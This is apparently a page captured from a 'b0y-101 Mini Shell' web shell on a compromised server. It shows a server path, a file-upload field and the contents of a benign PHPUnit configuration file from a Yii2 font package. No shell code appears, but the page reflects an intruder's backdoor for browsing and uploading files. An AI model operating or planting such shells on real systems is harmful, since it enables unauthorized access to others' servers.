b0y-101 Mini Shell


Current Path : E:/www/b-group.old/business/applicationmba/vendor/rmrevin/yii2-fontawesome/
File Upload :
Current File : E:/www/b-group.old/business/applicationmba/vendor/rmrevin/yii2-fontawesome/phpunit.xml.dist

<?xml version="1.0" encoding="utf-8"?>
<phpunit bootstrap="./tests/unit/bootstrap.php"
         colors="true"
         convertErrorsToExceptions="true"
         convertNoticesToExceptions="true"
         convertWarningsToExceptions="true"
         stopOnFailure="false">
    <filter>
        <whitelist>
            <directory suffix=".php">./</directory>
            <exclude>
                <directory>./tests</directory>
                <directory>./vendor</directory>
            </exclude>
        </whitelist>
    </filter>
    <testsuites>
        <testsuite name="Test Suite">
            <directory>./tests/unit/fontawesome</directory>
        </testsuite>
    </testsuites>
    <logging>
        <log type="coverage-html" target="./coverage"/>
    </logging>
</phpunit>

Copyright © 2019 by b0y-101